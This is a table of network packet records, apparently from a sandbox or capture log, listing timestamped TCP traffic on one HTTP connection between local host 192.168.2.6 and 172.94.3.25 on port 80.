Sep 25, 2024 16:03:35.469671011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469696045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469717026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469728947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469743967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469754934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469768047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469779015 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.469855070 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.469861984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469872952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469893932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.469940901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469950914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469961882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469970942 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.469974041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469985008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.469994068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.470027924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.547939062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.547956944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.547970057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.547991037 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548177958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548190117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548201084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548213959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548230886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548234940 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548242092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548253059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548269033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548290968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548310995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548311949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548324108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548335075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548357964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548463106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548472881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548485041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.548496962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.548521996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626198053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626223087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626236916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626338959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626512051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626523972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626544952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626554012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626554966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626568079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626578093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626590014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626616001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626617908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626626015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626646042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626761913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626773119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626784086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.626792908 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.626820087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:35.714488983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.715281010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:35.715399027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.590939999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.590960026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.590972900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591080904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591120958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.591161966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591169119 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.591173887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591185093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591198921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591208935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.591212034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591229916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.591233015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591243982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591254950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591264963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591275930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.591278076 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.591312885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.668827057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.668845892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.668859005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.668879032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.668893099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.668962002 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669009924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669075012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669086933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669101000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669109106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669141054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669312954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669325113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669337988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669373035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669492006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669528008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669544935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669557095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669585943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669591904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.669640064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669651031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.669673920 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.717991114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.746957064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.746984959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.746998072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747045040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747056007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747066975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747071981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747085094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747103930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747124910 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747293949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747306108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747317076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747334003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747354031 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747415066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747466087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747478008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747488976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747504950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747523069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.747570038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747648954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747663021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.747755051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.825278997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825298071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825318098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825330973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825344086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825345039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.825357914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825375080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.825398922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.825557947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825570107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825579882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825609922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.825752020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825762033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825776100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825787067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.825790882 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.825819969 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.835464954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.835480928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.835525990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.889906883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.903551102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903578997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903593063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903605938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903628111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903640032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903652906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903664112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903676987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903685093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.903690100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903758049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.903784990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903796911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903809071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.903846979 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.913754940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.913796902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.913846016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.956095934 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.982099056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982122898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982135057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982147932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982163906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982191086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982203960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982215881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982237101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982247114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982258081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982270956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982284069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.982378960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.982446909 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:37.991915941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.991933107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:37.992005110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.059838057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.059876919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.059887886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.059897900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.059992075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.060332060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060344934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060369968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060376883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.060380936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060394049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060405016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060417891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060429096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060437918 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.060462952 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.060503006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060513973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060525894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.060543060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.108798027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.138123035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138139963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138149977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138164043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138175011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138187885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138360977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138380051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138386965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.138396025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138410091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138425112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138449907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.138510942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138521910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138534069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.138555050 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.138573885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216211081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216228008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216295958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216308117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216320038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216335058 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216356039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216367006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216411114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216415882 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216423988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216434002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216440916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216470957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216511011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216521025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216547966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216557980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216567993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216578960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216593981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216603994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216614962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216631889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.216636896 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.216664076 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.294452906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294625998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294639111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294651031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294661999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294673920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294687033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294699907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294701099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.294737101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.294790030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.294874907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294887066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294898033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294915915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294926882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.294936895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.294966936 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375272036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375297070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375309944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375320911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375334024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375339985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375365019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375432014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375463009 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375499964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375509977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375521898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375544071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375549078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375580072 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375673056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375850916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375861883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375870943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375883102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375884056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375894070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.375902891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.375933886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.382690907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.382705927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.382745028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.453669071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453687906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453701019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453713894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453732014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.453840017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453891993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.453931093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453948975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453984976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.453996897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454008102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454034090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.454034090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.454138994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454149961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454161882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454195976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454200983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.454200983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:38.454207897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454221010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:38.454256058 CEST	49715	80	192.168.2.6	172.94.3.25
